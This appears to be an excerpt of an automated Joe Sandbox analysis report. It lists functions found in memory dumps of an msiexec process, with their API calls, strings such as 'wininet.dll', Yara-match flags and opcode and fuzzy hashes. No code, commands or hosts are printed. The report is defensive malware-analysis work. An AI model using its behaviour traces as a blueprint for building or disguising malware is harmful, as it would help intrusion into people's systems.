Instruction ID: 5f9aefbc82ec95f36fa7f8dfbbeb047e6b7a51e85d17ae41c66951cb6ca45ac0
Opcode Fuzzy Hash: 3a65b709398ae689a3f8d502e41b117c4e7fab82455313b8b7df692e772dee9c
Instruction Fuzzy Hash: 3590027120140842F10071584404B4600568BE0706F55C026B0129654D8615D9517531

Function 04C22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22C7A

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e079a85b57cbd1672ce38dc4a33b8b6a4098118dc5b867b09583459f3e54ff7
Instruction ID: 2fb9c67340e05b3103bb923354a579ca28a56829b0365945dd479b77ca7fa5b5
Opcode Fuzzy Hash: 4e079a85b57cbd1672ce38dc4a33b8b6a4098118dc5b867b09583459f3e54ff7
Instruction Fuzzy Hash: A690027120148802F1107158840474A00568BD0706F59C421B4429658D8695D9917131

Function 04C22DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22DDA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1977da12fe6793dd8585da13b5997d2ad79c4586eeba05338e41219eb0dd9e3b
Instruction ID: a0f80e3959003401eb7aec2bb6f40d2648c03c765fd7e5d2506877fcdcb2c7e0
Opcode Fuzzy Hash: 1977da12fe6793dd8585da13b5997d2ad79c4586eeba05338e41219eb0dd9e3b
Instruction Fuzzy Hash: B3900261242441527545B158440450740579BE0646795C022B1419950C8526E956E631

Function 04C22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22DFA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b526420d49c4ad7bbc450ce56b47fa0ec9551b453866ef81381b5520e3b148c3
Instruction ID: b488813549bea6a067784fc41d98d79983e0a576c70e6a32d6843ca4c0a9218a
Opcode Fuzzy Hash: b526420d49c4ad7bbc450ce56b47fa0ec9551b453866ef81381b5520e3b148c3
Instruction Fuzzy Hash: 6E90027120140413F11171584504707005A8BD0646F95C422B0429558D9656DA52B131

Function 04C22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22D1A

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fb422f77fe1b07d7cdbb9f7c7ce7a0886c40e6b52fc9fe624e6e6a05359c20d
Instruction ID: 793021dedcb5c9282876f8790727537f20f964cc1f1fb948afd62f5370d5543d
Opcode Fuzzy Hash: 6fb422f77fe1b07d7cdbb9f7c7ce7a0886c40e6b52fc9fe624e6e6a05359c20d
Instruction Fuzzy Hash: 5290026921340002F1807158540860A00568BD1607F95D425B001A558CC915D9696331

Function 04C22EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22EAA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eeefa5d9b8a1029ee9f41c1ae8dec85fceee76112f41025b42c30c5e5e6026a8
Instruction ID: 529cf1827c85a054d84a3eafbb97df6cc8314552be32e743576fe65782ee05c5
Opcode Fuzzy Hash: eeefa5d9b8a1029ee9f41c1ae8dec85fceee76112f41025b42c30c5e5e6026a8
Instruction Fuzzy Hash: 489002B120140402F1407158440474600568BD0706F55C021B5069554E8659DED57675

Function 04C22FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22FEA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: babe00be8f898bd1acde8f028b82106d1806474ef725e46590fd52a75f35e147
Instruction ID: c2c9070b21da3e21df0536210b907ca179fbe4e34876676b076d43aed0caf181
Opcode Fuzzy Hash: babe00be8f898bd1acde8f028b82106d1806474ef725e46590fd52a75f35e147
Instruction Fuzzy Hash: B7900261211C0042F20075684C14B0700568BD0707F55C125B0159554CC915D9616531

Function 04C22F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22F3A

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5649db3da31f7c16968db1ab49cbe0fbeed937d9fec62f3998cf7aa2ddb31298
Instruction ID: 395e9dc8aa14cec5c4cd82248d9bf66357e1380b691d2e2c95adc8fd47ad85e0
Opcode Fuzzy Hash: 5649db3da31f7c16968db1ab49cbe0fbeed937d9fec62f3998cf7aa2ddb31298
Instruction Fuzzy Hash: F49002A134140442F10071584414B060056CBE1706F55C025F1069554D8619DD527136

Function 04C22AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22ADA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66f66bd5a32fce97958a5c4cf58538f8634b108535e5e516a7b123a00f37da40
Instruction ID: c2b31d3ca046f5c26df60e6086cc385bc5e4cf02e4349ae6e5aa088a1f920a2c
Opcode Fuzzy Hash: 66f66bd5a32fce97958a5c4cf58538f8634b108535e5e516a7b123a00f37da40
Instruction Fuzzy Hash: 2B900265211400032105B558070450700978BD5756355C031F101A550CD621D9616131

Function 04C22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22B6A

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79ed0d024903bb0a83e6f847c83aa6c9d3aac56950c211458405d50647cb7132
Instruction ID: 068887229c4c55ea2f2ef18539f5dbcccc909e148627cc809c6c8c3d48da25c5
Opcode Fuzzy Hash: 79ed0d024903bb0a83e6f847c83aa6c9d3aac56950c211458405d50647cb7132
Instruction Fuzzy Hash: E59002A120240003610571584414616405B8BE0606B55C031F1019590DC525D9917135

Function 04C235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C235CA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e06887f2c363dea132a8a805af35365030bda9f1549ded99757d2b84a5b9b93f
Instruction ID: 8e103ff02c826e39365fa7df72148f4626f416f790ad014e4d6ed31306691c56
Opcode Fuzzy Hash: e06887f2c363dea132a8a805af35365030bda9f1549ded99757d2b84a5b9b93f
Instruction Fuzzy Hash: F090027160550402F1007158451470610568BD0606F65C421B0429568D8795DA5175B2

Function 02D09070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02D09118

Strings

net.dll, xrefs: 02D090E1, 02D09167, 02D0913F, 02D0914B, 02D09173
wininet.dll, xrefs: 02D090CE, 02D090D7

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 77791a317c1ad712df139d13927c17679717c21c9eda19342d1fe3dec0682886
Instruction ID: 6da195af1fedb8e1356ac4346138206d027a41eab819dfdc3fbeba0b0d310d28
Opcode Fuzzy Hash: 77791a317c1ad712df139d13927c17679717c21c9eda19342d1fe3dec0682886
Instruction Fuzzy Hash: 573181B2600644BBC714DF64C8C5FA7B7B9EB48B00F00841DF66A5B395D630A950CBA5

Function 02D09066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02D09118

Strings

net.dll, xrefs: 02D090E1, 02D0913F, 02D0914B
wininet.dll, xrefs: 02D090CE, 02D090D7

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 075c51ced5af31e8b45a14059f449732574195c2c4f4d72015442c7db2fce94a
Instruction ID: afd5e28817ba50d1f4c9f272e27ad5d3d88def2df34bfb4cc30161943807603b
Opcode Fuzzy Hash: 075c51ced5af31e8b45a14059f449732574195c2c4f4d72015442c7db2fce94a
Instruction Fuzzy Hash: 7021F3B1A40700BBC714DF64C8C5FABB7B4EB88B00F10801DE6295B391C774A950CBA5

Function 02D0A65D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02CF3AF8), ref: 02D0A68D

Strings

.z`, xrefs: 02D0A67C, 02D0A688

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 2ac611508f3a16e7cbd7faa76615b0aedf1983a562662d0e3394fa6c9a0d79e1
Instruction ID: bf17d8cbf76c7f3bb167ebd0fc2b6e2ec801d82872561161408a757584615875
Opcode Fuzzy Hash: 2ac611508f3a16e7cbd7faa76615b0aedf1983a562662d0e3394fa6c9a0d79e1
Instruction Fuzzy Hash: 8FF03AB52143046FCB14EFA8DC85EA77B69EF85354F018595FA1C9B392D530E9108AF0

Function 02D0A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02CF3AF8), ref: 02D0A68D

Strings

.z`, xrefs: 02D0A67C, 02D0A688

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: f11fb3c66fe61c695725b852f3089e27791e6ba6bbf337710d5e0f5ab8d22251
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C3E01AB12002046BD714DF59CC44EA777ADEF88750F014554BA1C57291C630E9108AB0

Function 02CF8310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02CF836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02CF838B

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: 1c246cc50a4623639593a28ee308a7506a36bd3623e48a1af0fd78bcda0db03d
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: 9701DB31A8022877E760A6949C42FFF776D9B40F51F050215FF08BA1C1E7A46A064BF5

Function 02CFACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02CFAD52

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 5459239131a541614873cde144dd61ff4ec61b9006b6ca97f00d825929e47eec
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: B3011EB6D4020DABDB50EAE4DC81F9DB3B9DB54308F108195EA0C97290FA71EB14CBA1

Function 02D0A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D0A724

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: fea1ba1b5577049003b6c57b99f88ffac04c8c9e5da411cdb4cc8841bdc337ac
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 5B01AFB2214208AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97250C630E851CBA4

Function 02D0A6CD Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D0A724

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 3bda8d44e126f7afff4a81f4d2789008ca80118fbf39c6fe45cb1351d24439e8
Instruction ID: b16349f8533fbc12033a5cc3f5c4bd2bf70fdcf3ed7b3aded29276d79bd45c7b
Opcode Fuzzy Hash: 3bda8d44e126f7afff4a81f4d2789008ca80118fbf39c6fe45cb1351d24439e8
Instruction Fuzzy Hash: 3501AFB2214108AFCB54DF99DD80EEB77AAAF8C354F158258BA0DA7254D630E851CBA0

Function 02CFF6B7 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02CF8D14,?), ref: 02CFF6EB

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f3f0cbcf95f3740822516172a6a92854b6f2a6f54f527dd1d8892e3f9fffe2b0
Instruction ID: a1eb32d0e3d70629a36742297ffc1f9615e3b1ee0578491fefa65b5677047fb8
Opcode Fuzzy Hash: f3f0cbcf95f3740822516172a6a92854b6f2a6f54f527dd1d8892e3f9fffe2b0
Instruction Fuzzy Hash: C6F0C071A002092BEB80FA70DC82F77B399EFD5318F040199E60C873C2F760D54046A0

Function 02D091A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02CFF040,?,?,00000000), ref: 02D091DC

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction ID: b6e5722ce3623586a2c1668f9929dcd2a94a54af4108acb6aa93eed2063e9f90
Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction Fuzzy Hash: 1AE092373903043AE33066A9AC42FE7B39CCB81B60F140026FB0DEB2C1D995F80146E5

Function 02D0A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D04526,?,02D04C9F,02D04C9F,?,02D04526,?,?,?,?,?,00000000,00000000,?), ref: 02D0A64D

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b20d3b6387ba455458af0fe291fedc6f00c9812763780e233ad2cc0c9abc1a63
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 97E012B2200208ABDB14EF99CC80EA777ADEF88754F118558BA1C5B281CA30F9108AB0

Function 02D0A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02CFF1C2,02CFF1C2,?,00000000,?,?), ref: 02D0A7F0

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: bc116f196336801beae119a0612b068d6536309022804664a8bbf32d79887f88
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 0FE01AB12002086BDB10DF59CC84EE737ADEF88750F018154BA0C57281C930E8108BF5

Function 02D0A654 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D04526,?,02D04C9F,02D04C9F,?,02D04526,?,?,?,?,?,00000000,00000000,?), ref: 02D0A64D

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cb987f233a676c84392344b66c2222f35c9d4ebeb7b371ca69a462bcb27da232
Instruction ID: 76d903590a5657ede9c928d9a0140f20b07fbdb47a796d403831ba4d8a3523d8
Opcode Fuzzy Hash: cb987f233a676c84392344b66c2222f35c9d4ebeb7b371ca69a462bcb27da232
Instruction Fuzzy Hash: 33D05EB12006156FDB00EE65DC84EAB3369EF84755B408804F90D873D5C531DC118AF0

Function 02CFF6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02CF8D14,?), ref: 02CFF6EB

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: b409df4311e2bb6641f1290bd210c264d05cb5bc6bcb431894839d7cbe344745
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: C0D05E626503042BE650BAA49C02F6632899B84A04F490064FA48973C3E954E5004565

Function 04C22C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22C24

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec8835e5682e650ebaed85fd17f19ab6cd9b3c050ab8dd93b2ddb1afe4b0d861
Instruction ID: 66daf1e35294b94972a1a512fdbae4fc8832d0a98553db55555fa20084c0122b
Opcode Fuzzy Hash: ec8835e5682e650ebaed85fd17f19ab6cd9b3c050ab8dd93b2ddb1afe4b0d861
Instruction Fuzzy Hash: 64B09B719015D5C5FB11F764470871779516BD0705F15C071E2034641E4778D1D1F175

Non-executed Functions

Function 003F31A9 Relevance: 78.6, APIs: 52, Instructions: 599memoryCOMMON

Download Yara Rule

APIs

FreeSid.ADVAPI32(?), ref: 003F3256
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3274
FreeSid.ADVAPI32(?), ref: 003F3292
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F32B0
FreeSid.ADVAPI32(?), ref: 003F32CE
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F32F0
FreeSid.ADVAPI32(?), ref: 003F330E
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F332C
FreeSid.ADVAPI32(?), ref: 003F334A
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000014,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3368
FreeSid.ADVAPI32(?), ref: 003F33CF
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F33EC
FreeSid.ADVAPI32(?), ref: 003F340A
